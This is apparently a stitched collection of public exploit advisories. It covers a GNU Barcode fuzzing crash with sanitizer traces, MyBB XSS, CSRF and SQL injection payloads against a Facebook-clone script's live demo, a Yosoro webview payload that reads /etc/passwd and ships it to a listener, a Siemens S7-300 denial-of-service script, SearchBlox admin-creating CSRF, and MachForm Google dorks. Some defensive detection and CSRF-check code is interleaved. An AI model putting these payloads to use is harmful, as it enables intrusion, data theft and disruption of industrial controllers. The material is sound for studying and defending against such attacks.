   [70.00 158.50  20.00  0.85]      [70.00 162.00  20.00  1.85]
   [70.00 164.50  20.00  0.85]      [70.00 168.50  20.00  2.85]
   [70.00 172.00  20.00  1.85]      [70.00 175.50  20.00  0.85]
   [70.00 179.50  20.00  2.85]      [70.00 183.00  20.00  1.85]
   [70.00 186.50  20.00  0.85]      [70.00 190.50  20.00  2.85]
   [70.00 194.00  20.00  1.85]      [70.00 197.50  20.00  0.85]
   [70.00 201.50  20.00  2.85]      [70.00 205.00  20.00  1.85]
   [70.00 209.00  20.00  1.85]      [70.00 212.50  20.00  0.85]
   [70.00 215.50  20.00  2.85]      [70.00 220.00  20.00  1.85]
   [70.00 223.50  20.00  0.85]      [70.00 227.50  20.00  2.85]
   [70.00 230.50  20.00  0.85]      [70.00 233.00  20.00  1.85]
   [70.00 237.50  20.00  2.85]      [70.00 241.50  20.00  0.85]
   [70.00 245.00  20.00  3.85]      [70.00 249.50  20.00  0.85]
   [70.00 252.50  20.00  0.85]      [70.00 258.00  20.00  1.85]
   [70.00 260.50  20.00  0.85]      [70.00 263.50  20.00  0.85]
   [70.00 267.00  20.00  1.85]      [70.00 269.50  20.00  0.85]
   [70.00 275.50  20.00  2.85]      [70.00 279.50  20.00  0.85]
   [70.00 283.00  20.00  1.85]      [70.00 285.50  20.00  0.85]
   [70.00 289.50  20.00  2.85]      [70.00 293.00  20.00  1.85]
   [70.00 297.00  20.00  1.85]      [70.00 301.50  20.00  2.85]
   [70.00 304.50  20.00  0.85]      [70.00 307.50  20.00  0.85]
   [70.00 310.00  20.00  1.85]      [70.00 314.50  20.00  2.85]
   [70.00 318.50  20.00  0.85]      [70.00 322.00  20.00  3.85]
   [70.00 326.50  20.00  0.85]      [70.00 329.50  20.00  0.85]
   [70.00 332.50  20.00  0.85]      [70.00 337.00  20.00  3.85]
   [70.00 340.50  20.00  0.85]      [70.00 345.50  20.00  0.85]
   [70.00 348.00  20.00  1.85]      [70.00 352.50  20.00  2.85]
   [70.00 356.50  20.00  0.85]      [70.00 360.00  20.00  1.85]
   [70.00 362.50  20.00  0.85]      [70.00 366.50  20.00  2.85]
   [70.00 370.00  20.00  1.85]      [70.00 373.50  20.00  0.85]
   [70.00 377.50  20.00  2.85]      [70.00 381.00  20.00  1.85]
   [70.00 384.50  20.00  0.85]      [70.00 388.50  20.00  2.85]
   [70.00 392.00  20.00  1.85]      [70.00 395.50  20.00  0.85]
   [70.00 399.50  20.00  2.85]      [70.00 403.00  20.00  1.85]
   [70.00 406.50  20.00  0.85]      [70.00 410.50  20.00  2.85]
   [70.00 414.00  20.00  1.85]      [70.00 417.50  20.00  0.85]
   [70.00 421.50  20.00  2.85]      [70.00 425.00  20.00  1.85]
   [70.00 428.50  20.00  0.85]      [70.00 431.00  20.00  1.85]
   [70.00 435.50  20.00  2.85]      [70.00 439.50  20.00  0.85]
   [70.00 445.00  20.00  3.85]      [70.00 448.50  20.00  0.85]
   [70.00 450.50  20.00  0.85]      [70.00 452.50  20.00  0.85]
   [70.00 457.00  20.00  3.85]      [70.00 462.50  20.00  2.85]
   [70.00 466.50  20.00  0.85]      [70.00 470.00  20.00  1.85]
   [70.00 472.50  20.00  0.85]      [70.00 476.00  20.00  1.85]
   [70.00 481.50  20.00  0.85]      [70.00 483.50  20.00  0.85]
   [70.00 486.50  20.00  0.85]      [70.00 489.00  20.00  1.85]
   [70.00 496.00  20.00  3.85]      [70.00 499.50  20.00  0.85]
   [70.00 502.50  20.00  0.85]      [70.00 505.50  20.00  0.85]
   [70.00 511.00  20.00  3.85]      [70.00 514.50  20.00  0.85]
   [70.00 516.50  20.00  0.85]      [70.00 521.50  20.00  0.85]
   [70.00 524.00  20.00  1.85]      [70.00 527.50  20.00  0.85]
   [70.00 530.00  20.00  1.85]      [70.00 534.50  20.00  2.85]
   [70.00 538.50  20.00  0.85]      [70.00 541.50  20.00  0.85]
   [70.00 546.00  20.00  3.85]      [70.00 549.50  20.00  0.85]
   [70.00 552.00  20.00  1.85]      [70.00 555.50  20.00  0.85]
   [70.00 560.50  20.00  0.85]      [70.00 562.50  20.00  0.85]
   [70.00 567.00  20.00  3.85]      [70.00 572.50  20.00  2.85]
   [70.00 576.50  20.00  0.85]      [70.00 580.00  20.00  1.85]
   [70.00 582.50  20.00  0.85]      [70.00 586.50  20.00  2.85]
   [70.00 591.00  20.00  1.85]      [70.00 594.00  20.00  1.85]
   [70.00 598.50  20.00  2.85]      [70.00 602.50  20.00  0.85]
   [70.00 605.50  20.00  2.85]      [70.00 608.50  20.00  0.85]
   [70.00 612.00  20.00  1.85]      [70.00 615.50  20.00  0.85]
   [70.00 620.00  20.00  1.85]      [70.00 622.50  20.00  0.85]
   [75.00 627.00  15.00  1.85]      [75.00 632.50  15.00  2.85]
   [75.00 635.50  15.00  0.85]      [75.00 638.00  15.00  1.85]

] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
%   char    xpos   ypos fontsize
    [(o)   21.00  10.00 12.00]
    [(/)   32.00  10.00  0.00]
    [(c)   43.00  10.00  0.00]
    [(r)   54.00  10.00  0.00]
    [(a)   65.00  10.00  0.00]
    [(s)   76.00  10.00  0.00]
    [(h)   87.00  10.00  0.00]
    [(e)   98.00  10.00  0.00]
    [(s)  109.00  10.00  0.00]
    [(/)  120.00  10.00  0.00]
    [(i)  131.00  10.00  0.00]
    [(d)  142.00  10.00  0.00]
    [(:)  153.00  10.00  0.00]
    [(0)  164.00  10.00  0.00]
    [(0)  175.00  10.00  0.00]
    [(0)  186.00  10.00  0.00]
    [(0)  197.00  10.00  0.00]
    [(3)  208.00  10.00  0.00]
    [(4)  219.00  10.00  0.00]
    [(,)  230.00  10.00  0.00]
    [(s)  241.00  10.00  0.00]
    [(i)  252.00  10.00  0.00]
    [(g)  263.00  10.00  0.00]
    [(:)  274.00  10.00  0.00]
    [(0)  285.00  10.00  0.00]
    [(6)  296.00  10.00  0.00]
    [(,)  307.00  10.00  0.00]
    [(s)  318.00  10.00  0.00]
    [(r)  329.00  10.00  0.00]
    [(c)  340.00  10.00  0.00]
    [(:)  351.00  10.00  0.00]
    [(0)  362.00  10.00  0.00]
    [(0)  373.00  10.00  0.00]
    [(0)  384.00  10.00  0.00]
    [(0)  395.00  10.00  0.00]
    [(0)  406.00  10.00  0.00]
    [(0)  417.00  10.00  0.00]
    [(,)  428.00  10.00  0.00]
    [(o)  439.00  10.00  0.00]
    [(p)  450.00  10.00  0.00]
    [(:)  461.00  10.00  0.00]
    [(h)  472.00  10.00  0.00]
    [(a)  483.00  10.00  0.00]
    [(v)  494.00  10.00  0.00]
    [(o)  505.00  10.00  0.00]
    [(c)  516.00  10.00  0.00]
    [(,)  527.00  10.00  0.00]
    [(r)  538.00  10.00  0.00]
    [(e)  549.00  10.00  0.00]
    [(p)  560.00  10.00  0.00]
    [(:)  571.00  10.00  0.00]
    [(1)  582.00  10.00  0.00]
    [(2)  593.00  10.00  0.00]
    [(8)  604.00  10.00  0.00]
]   { {} forall dup 0.00 ne {
  /Helvetica findfont exch scalefont setfont
    } {pop} ifelse
    moveto show} bind forall
% End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128"

showpage
%%Trailer

==2183==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 512 byte(s) in 1 object(s) allocated from:
    #0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
    #1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132

Direct leak of 55 byte(s) in 1 object(s) allocated from:
    #0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)

SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).
            
# GNU Barcode 0.99 - Buffer Overflow
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Author: Gjoko 'LiquidWorm' Krstic
# Tested on: Ubuntu 16.04.4
# Affected version: 0.99

# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.

# Desc: The vulnerability is caused due to a boundary error in the processing of an
# input file, which can be exploited to cause a buffer overflow when a user processes
# e.g. a specially crafted file. The AddressSanitizer trace below shows a one-byte
# out-of-bounds read of a global table in Barcode_93_encode (code93.c, line 169), where
# shiftset2 is indexed directly by an input byte; the reproduction demonstrates a crash,
# and the author's claim that successful exploitation could allow execution of arbitrary
# code on the affected machine is asserted rather than demonstrated here.


code93.c:

165: strcat(partial, codeset[code]);
166: checksum_str[checksum_len++] = code;
167: 
168: /* Encode the second character */
169: code = strchr(alphabet, shiftset2[(int)(text[i])]) - alphabet;
170: strcat(partial, codeset[code]);
171: checksum_str[checksum_len++] = code;

lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -i id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog

%%Page: 1 1

% Printing barcode for "W+G$A+M%KWWGWWWWWWWW9WW", scaled  1.00, encoded using "code 39"
% The space/bar succession is represented by the following widths (space first):
% 01311313111333111111113111313111111133131131313111131111311311311131311313111131111131313113111111331333111111133311111111111133131333111111133311111113331111111333111111133311111113331111111333111111133311111111133113111333111111133311111113111113311131131311
[
%  height  xpos   ypos  width       height  xpos   ypos  width
   [75.00  10.50  15.00  0.85]      [75.00  14.50  15.00  0.85]
   [75.00  17.50  15.00  2.85]      [75.00  21.50  15.00  2.85]
   [75.00  24.50  15.00  0.85]      [70.00  27.50  20.00  2.85]
   [70.00  33.50  20.00  2.85]      [70.00  36.50  20.00  0.85]
   [70.00  38.50  20.00  0.85]      [70.00  40.50  20.00  0.85]
   [70.00  42.50  20.00  0.85]      [70.00  46.50  20.00  0.85]
   [70.00  48.50  20.00  0.85]      [70.00  52.50  20.00  0.85]
   [70.00  56.50  20.00  0.85]      [70.00  58.50  20.00  0.85]
   [70.00  60.50  20.00  0.85]      [70.00  62.50  20.00  0.85]
   [70.00  67.50  20.00  2.85]      [70.00  71.50  20.00  2.85]
   [70.00  74.50  20.00  0.85]      [70.00  78.50  20.00  0.85]
   [70.00  82.50  20.00  0.85]      [70.00  86.50  20.00  0.85]
   [70.00  88.50  20.00  0.85]      [70.00  91.50  20.00  2.85]
   [70.00  94.50  20.00  0.85]      [70.00  96.50  20.00  0.85]
   [70.00 100.50  20.00  0.85]      [70.00 103.50  20.00  2.85]
   [70.00 106.50  20.00  0.85]      [70.00 110.50  20.00  0.85]
   [70.00 112.50  20.00  0.85]      [70.00 116.50  20.00  0.85]
   [70.00 120.50  20.00  0.85]      [70.00 123.50  20.00  2.85]
   [70.00 127.50  20.00  2.85]      [70.00 130.50  20.00  0.85]
   [70.00 132.50  20.00  0.85]      [70.00 136.50  20.00  0.85]
   [70.00 138.50  20.00  0.85]      [70.00 140.50  20.00  0.85]
   [70.00 144.50  20.00  0.85]      [70.00 148.50  20.00  0.85]
   [70.00 152.50  20.00  0.85]      [70.00 155.50  20.00  2.85]
   [70.00 158.50  20.00  0.85]      [70.00 160.50  20.00  0.85]
   [70.00 162.50  20.00  0.85]      [70.00 167.50  20.00  2.85]
   [70.00 171.50  20.00  2.85]      [70.00 177.50  20.00  2.85]
   [70.00 180.50  20.00  0.85]      [70.00 182.50  20.00  0.85]
   [70.00 184.50  20.00  0.85]      [70.00 187.50  20.00  2.85]
   [70.00 193.50  20.00  2.85]      [70.00 196.50  20.00  0.85]
   [70.00 198.50  20.00  0.85]      [70.00 200.50  20.00  0.85]
   [70.00 202.50  20.00  0.85]      [70.00 204.50  20.00  0.85]
   [70.00 206.50  20.00  0.85]      [70.00 211.50  20.00  2.85]
   [70.00 215.50  20.00  2.85]      [70.00 219.50  20.00  2.85]
   [70.00 225.50  20.00  2.85]      [70.00 228.50  20.00  0.85]
   [70.00 230.50  20.00  0.85]      [70.00 232.50  20.00  0.85]
   [70.00 235.50  20.00  2.85]      [70.00 241.50  20.00  2.85]
   [70.00 244.50  20.00  0.85]      [70.00 246.50  20.00  0.85]
   [70.00 248.50  20.00  0.85]      [70.00 251.50  20.00  2.85]
   [70.00 257.50  20.00  2.85]      [70.00 260.50  20.00  0.85]
   [70.00 262.50  20.00  0.85]      [70.00 264.50  20.00  0.85]
   [70.00 267.50  20.00  2.85]      [70.00 273.50  20.00  2.85]
   [70.00 276.50  20.00  0.85]      [70.00 278.50  20.00  0.85]
   [70.00 280.50  20.00  0.85]      [70.00 283.50  20.00  2.85]
   [70.00 289.50  20.00  2.85]      [70.00 292.50  20.00  0.85]
   [70.00 294.50  20.00  0.85]      [70.00 296.50  20.00  0.85]
   [70.00 299.50  20.00  2.85]      [70.00 305.50  20.00  2.85]
   [70.00 308.50  20.00  0.85]      [70.00 310.50  20.00  0.85]
   [70.00 312.50  20.00  0.85]      [70.00 315.50  20.00  2.85]
   [70.00 321.50  20.00  2.85]      [70.00 324.50  20.00  0.85]
   [70.00 326.50  20.00  0.85]      [70.00 328.50  20.00  0.85]
   [70.00 331.50  20.00  2.85]      [70.00 337.50  20.00  2.85]
   [70.00 340.50  20.00  0.85]      [70.00 342.50  20.00  0.85]
   [70.00 344.50  20.00  0.85]      [70.00 346.50  20.00  0.85]
   [70.00 349.50  20.00  2.85]      [70.00 354.50  20.00  0.85]
   [70.00 357.50  20.00  2.85]      [70.00 360.50  20.00  0.85]
   [70.00 363.50  20.00  2.85]      [70.00 369.50  20.00  2.85]
   [70.00 372.50  20.00  0.85]      [70.00 374.50  20.00  0.85]
   [70.00 376.50  20.00  0.85]      [70.00 379.50  20.00  2.85]
   [70.00 385.50  20.00  2.85]      [70.00 388.50  20.00  0.85]
   [70.00 390.50  20.00  0.85]      [70.00 392.50  20.00  0.85]
   [70.00 395.50  20.00  2.85]      [70.00 398.50  20.00  0.85]
   [70.00 400.50  20.00  0.85]      [70.00 403.50  20.00  2.85]
   [70.00 408.50  20.00  0.85]      [75.00 410.50  15.00  0.85]
   [75.00 414.50  15.00  0.85]      [75.00 417.50  15.00  2.85]
   [75.00 421.50  15.00  2.85]      [75.00 424.50  15.00  0.85]

]	{ {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
%   char    xpos   ypos fontsize
    [(W)   32.00  10.00 12.00]
    [(+)   48.00  10.00  0.00]
    [(G)   64.00  10.00  0.00]
    [($)   80.00  10.00  0.00]
    [(A)   96.00  10.00  0.00]
    [(+)  112.00  10.00  0.00]
    [(M)  128.00  10.00  0.00]
    [(%)  144.00  10.00  0.00]
    [(K)  160.00  10.00  0.00]
    [(W)  176.00  10.00  0.00]
    [(W)  192.00  10.00  0.00]
    [(G)  208.00  10.00  0.00]
    [(W)  224.00  10.00  0.00]
    [(W)  240.00  10.00  0.00]
    [(W)  256.00  10.00  0.00]
    [(W)  272.00  10.00  0.00]
    [(W)  288.00  10.00  0.00]
    [(W)  304.00  10.00  0.00]
    [(W)  320.00  10.00  0.00]
    [(W)  336.00  10.00  0.00]
    [(9)  352.00  10.00  0.00]
    [(W)  368.00  10.00  0.00]
    [(W)  384.00  10.00  0.00]
]   { {} forall dup 0.00 ne {
	/Helvetica findfont exch scalefont setfont
    } {pop} ifelse
    moveto show} bind forall
% End barcode for "W+G$A+M%KWWGWWWWWWWW9WW"

showpage
%%Page: 2 2

=================================================================
==11076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000043bc02 at pc 0x00000042189a bp 0x7fff2f160c00 sp 0x7fff2f160bf0
READ of size 1 at 0x00000043bc02 thread T0
    #0 0x421899 in Barcode_93_encode /home/lqwrm/research/barcode-0.99/code93.c:169
    #1 0x409ac2 in Barcode_Encode_and_Print /home/lqwrm/research/barcode-0.99/library.c:234
    #2 0x402319 in main /home/lqwrm/research/barcode-0.99/main.c:564
    #3 0x7f9b8745282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #4 0x404708 in _start (/home/lqwrm/research/barcode-0.99/barcode+0x404708)

0x00000043bc02 is located 32 bytes to the right of global variable '*.LC6' defined in 'code93.c' (0x43bbe0) of size 2
  '*.LC6' is ascii string '1'
0x00000043bc02 is located 30 bytes to the left of global variable 'CSWTCH.16' defined in 'code93.c:146:5' (0x43bc20) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow /home/lqwrm/research/barcode-0.99/code93.c:169 Barcode_93_encode
Shadow bytes around the buggy address:
  0x00008007f730: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008007f740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008007f750: 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
  0x00008007f760: f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
  0x00008007f770: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 02 f9 f9 f9
=>0x00008007f780:[f9]f9 f9 f9 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9
  0x00008007f790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008007f7a0: 01 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x00008007f7b0: 00 00 00 00 00 00 00 00 01 f9 f9 f9 f9 f9 f9 f9
  0x00008007f7c0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
  0x00008007f7d0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==11076==ABORTING
            
# Exploit Title: MyBB ChangUonDyU Advanced Statistics Plugin v1.0.2 - Cross-Site Scripting
# Date: 5/25/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1125
# Version: 1.0.2
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-11532


1. Description:
This plugin displays advanced statistics on the index page such as latest posts with auto refresh using AJAX.
 

 
2. Proof of Concept:
Create a new thread with the following payload as the title: <svg onload=alert('XSS')>

The alert will appear on the index page.



3. Solution:
Update to the latest release
            
# Exploit Title: Facebook Clone Script 1.0.5 - Cross-Site Request Forgery
# Date: 2018-05-29
# Exploit Author: L0RD
# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
# Version: 1.0.5
# Tested on: Win 10

# Description :
# Facebook Clone Script 1.0.5 has a CSRF vulnerability through which an attacker can
# easily change a user's information.

# POC :

<html>
  <head>
     <title>Change information</title>
  </head>
  <body>
    <form action="http://smsemailmarketing.in/demo/fbclone/setting.php" method="POST">
      <input type="hidden" name="fn" value="anything" />
      <input type="hidden" name="ln" value="anything" />
      <input type="hidden" name="chnname" value="anything" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>
            
# Exploit Title: Facebook Clone Script 1.0.5 - 'search' SQL Injection
# Date: 2018-05-29
# Exploit Author: L0RD
# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
# Version: 1.0.5
# Tested on: Win 10

# POC : SQLi :

# Parameter : search
# Type : Union based
# Payload : 
1' UNION SELECT NULL,group_concat(table_name,0x3a,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()#

# Request

POST /demo/fbclone/top-search.php HTTP/1.1
Host: smsemailmarketing.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://smsemailmarketing.in/demo/fbclone/setting.php
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 231
Connection: keep-alive

search=1' UNION SELECT NULL,group_concat(table_name,0x3C62723E,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()#

# Response

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 29 May 2018 17:12:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 5370

<a href='friend-profile.php?id='><img  src="images/unknown.jpeg"
height="40px"
width="40px">About_you:a_id,about_you:u_id,about_you:u_nick,about_you:u_nickname,about_you:u_nick_show,about_you:nick_privacy,admin:id,admin:name,admin:username,admin:password,admin:ref_password,admin:sex,admin:email_id,admin:valid_id,admin:user_type,admin:user_level,admin:city_code,admin:state_code,admin:country_code,admin:userimages,admin:description
</a></div>
            
# Exploit title: Yosoro 1.0.4 - Remote Code Execution
# Date: 2018-05-29
# Exploit Author: Carlo Pelliccioni
# Vendor homepage: https://yosoro.coolecho.net/
# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
# Version: 1.0.4
# Tested on: MacOS 10.13.4
# CVE: CVE-2018-11522
#  _  _            _    _    _             ___                      _  _         
# | || | __ _  __ | |__| |_ (_)__ __ ___  / __| ___  __  _  _  _ _ (_)| |_  _  _ 
# | __ |/ _` |/ _|| / /|  _|| |\ V // -_) \__ \/ -_)/ _|| || || '_|| ||  _|| || |
# |_||_|\__,_|\__||_\_\ \__||_| \_/ \___| |___/\___|\__| \_,_||_|  |_| \__| \_, |

# Remote Code Execution (CVE-2018-11522)
# Payload: 

<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>
            
# Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-30
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-300 CPU family: all versions.
# Tested on: Kali Linux
# CVE: CVE-2015-2177

#!/usr/bin/python
import socket

target_address = "TargetIP"
target_port = 80

# Request line with a 2220-byte request target (bytes literal so it runs on Python 2 and 3)
buffer = b"GET " + b"\x42" * 2220 + b" HTTP/1.1\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.sendall(buffer)
sock.close()
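The whole request above is one abnormally long request line. On the monitoring side that is easy to flag before it reaches the controller: a reverse proxy or WAF in front of the device writes a standard access log, and a request target far longer than any portal URL, or one that is not even a path, stands out. The detector below is an added example written for this page (not vendor code); the log format, the 1024-byte threshold and the sample lines are assumptions and constructed data.

```python
import re
from collections import namedtuple

# Common/combined log format as written by a reverse proxy or WAF in front of
# the controller's web server (assumption: the device itself may keep no log).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

Alert = namedtuple("Alert", "ip ts reason length")

MAX_TARGET_LEN = 1024  # assumption: far longer than any legitimate portal URL


def check_target(target):
    """Return a reason string when the request target looks abnormal, else None."""
    if len(target) > MAX_TARGET_LEN:
        return "oversized request target"
    if not (target.startswith("/") or target == "*"
            or target.startswith(("http://", "https://"))):
        return "request target is not a path or absolute URL"
    return None


def analyse(lines):
    """Run the check over log lines and return the alerts raised."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            alerts.append(Alert("?", "?", "unparseable log line", len(line)))
            continue
        reason = check_target(m.group("target"))
        if reason:
            alerts.append(Alert(m.group("ip"), m.group("ts"), reason,
                                len(m.group("target"))))
    return alerts


# Constructed sample: two ordinary portal hits around one request shaped like
# the script above (a 2220-byte target made of 'B', i.e. 0x42).
SAMPLE = [
    '192.0.2.10 - - [30/May/2018:10:00:01 +0000] "GET /Portal/Portal.mwsl HTTP/1.1" 200 5120',
    '192.0.2.77 - - [30/May/2018:10:00:02 +0000] "GET ' + "B" * 2220 + ' HTTP/1.1" 400 0',
    '192.0.2.10 - - [30/May/2018:10:00:03 +0000] "GET /Portal/Portal.mwsl?lang=en HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for alert in analyse(SAMPLE):
        print(alert)
```

The length cap is the only tunable: set it from the longest URL the portal legitimately serves, then the rule raises nothing on normal traffic and one alert per oversized request.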
            
# Exploit Title: CSRF Privilege Escalation (Creation of an administrator account) on SearchBlox 8.6.6
# Exploit Author: Canberk BOLAT, Ahmet GÜREL
# Software Link: https://www.searchblox.com/
# Version: < = SearchBlox Version 8.6.6
# Platform: Java
# Tested on: Windows
# CVE: CVE-2018-11538

# 1. DETAILS

Using Cross-Site Request Forgery (CSRF), an attacker can force a user who
is currently authenticated with a web application to execute an unwanted
action. The attacker can trick the user into loading a page which may send
a request to perform the unwanted action in the background. In the case of
Searchblox, we can use CSRF to perform actions on the admin dashboard by
targeting an administrator.

# 2. PoC:

We assume that Searchblox is installed at http://localhost:8080/. Our
target is /searchblox/servlet/UserServlet, the page used to create a new
user, with its u_name, u_passwd1, u_passwd2 and role parameters. The given
PoC will create a user on the website which has full administrator privileges.

HTTP Request:

GET
/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser
HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/searchblox/admin/main.jsp?menu1=adm
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Cookie: JSESSIONID=touluja8tpjc1iiwquoyiigfi;
Connection: close
Upgrade-Insecure-Requests: 1

Attack Vector:

<img src="
http://target:8080/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser"
width="0" height="0">
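Both CSRF PoCs on this page, the auto-submitted hidden form in the Facebook Clone Script advisory and the zero-size image tag above, work because the endpoint accepts whatever the victim's browser sends with the session cookie attached. The check below is an added example written for this page, not code from either product; the request dictionaries, host names and field names are assumptions. It shows the three independent defences, any one of which would have stopped both requests: refusing state changes over safe methods (which kills the `<img>` GET outright), checking the Origin/Referer host, and requiring a session-bound token that an attacker's page cannot read.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Methods that must never change server state (RFC 7231 "safe" methods).
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def new_session():
    """Create a session record holding a per-session CSRF secret (kept server-side
    and rendered into the application's own forms as a hidden field)."""
    return {"csrf_token": secrets.token_urlsafe(32)}


def authorize_state_change(session, method, headers, form, allowed_hosts):
    """Decide whether a request to a state-changing endpoint may proceed.

    Returns (allowed, reason). The checks are ordered cheapest first; each one
    alone is enough to reject the two PoC requests."""
    if method.upper() in SAFE_METHODS:
        return False, "state change attempted with a safe method"
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        # Browsers send Origin on cross-site POSTs; with neither header we
        # cannot prove the request came from our own pages, so fail closed.
        return False, "no Origin or Referer header"
    host = urlsplit(source).netloc
    if host not in allowed_hosts:
        return False, "request originates from %r" % host
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, session["csrf_token"]):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed requests in the shape of the two PoCs (not captured traffic).
APP_HOSTS = {"localhost:8080"}


def demo():
    session = new_session()
    cases = {
        # SearchBlox-style: user creation triggered by a zero-size <img> GET.
        "img_get": ("GET", {"Referer": "http://attacker.example/page.html"}, {}),
        # Facebook Clone-style: hidden form auto-submitted by script on another site.
        "auto_post": ("POST", {"Origin": "http://attacker.example"},
                      {"fn": "anything", "ln": "anything"}),
        # The application's own form, carrying the session's token.
        "legit": ("POST", {"Origin": "http://localhost:8080"},
                  {"fn": "Alice", "csrf_token": session["csrf_token"]}),
        # Right origin, but a guessed or stale token.
        "stale": ("POST", {"Origin": "http://localhost:8080"},
                  {"fn": "Alice", "csrf_token": "0" * 43}),
    }
    return {name: authorize_state_change(session, m, h, f, APP_HOSTS)
            for name, (m, h, f) in cases.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a fourth, browser-enforced layer, but the server-side token remains the check that does not depend on client behaviour.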
            
Vendor: Appnitro
Product webpage: https://www.machform.com/
Full-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/
Fix: https://www.machform.com/blog-machform-423-security-release/

Author: Amine Taouirsa
Twitter: @metalamin

Google dork examples:
----------------------
"machform" inurl:"view.php"
"machform" inurl:"embed.php"

Summary:
---------
The form creation platform MachForm from Appnitro is subject to SQL
injections that lead to path traversal and arbitrary file upload.

The application is widely deployed, and with some Google dorks it’s possible
to find various web pages storing sensitive data such as credit card numbers with
